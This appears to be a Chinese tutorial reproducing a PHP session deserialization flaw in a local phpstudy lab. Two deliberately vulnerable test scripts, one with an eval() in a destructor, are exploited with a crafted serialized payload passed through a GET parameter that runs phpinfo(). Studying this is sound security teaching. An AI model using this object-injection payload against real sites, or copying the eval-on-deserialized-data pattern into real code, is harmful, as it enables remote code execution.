PHP SESSION反序列化本地样例分析

PHP SESSION反序列化本地样例分析

0X00漏洞原因

主要原因是： ini_set(‘session.serialize_handler’, ‘php_serialize’);

　　　　　　　ini_set(‘session.serialize_handler’, ‘php’);

　　　　　　　两者处理session的方式不同。

0X01漏洞分析

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样，会导致数据无法正确第反序列化。通过精心构造的数据包，就可以绕过程序的验证或者是执行一些系统的方法

0X02漏洞环境

Windows10

Phpstudy一件集成环境

0X03漏洞复现

首先现在本地phpstudy网站根目录新建俩个测试用例1.php和2.php

内容分别为

1.php：

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>

2.php：

<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["test"]=$_GET["a"]; ?>

漏洞利用

首先构造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

可以看到2.php中接收的参数为a

提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

也就是访问127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

访问后结果如下：

然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()

0X04漏洞分析

提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;}，

传入的数据会按照php_serialize来进行序列化：a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

此时访问1.php，应用程序会按照php来反序列化SESSION中的数据，此时就会反序列化伪造的数据，php引擎会以|作为作为key和value的分隔符，那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key，将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value，然后进行反序列化，最后就会就会实例化test对象，最后就会执行析构函数中的eval()方法。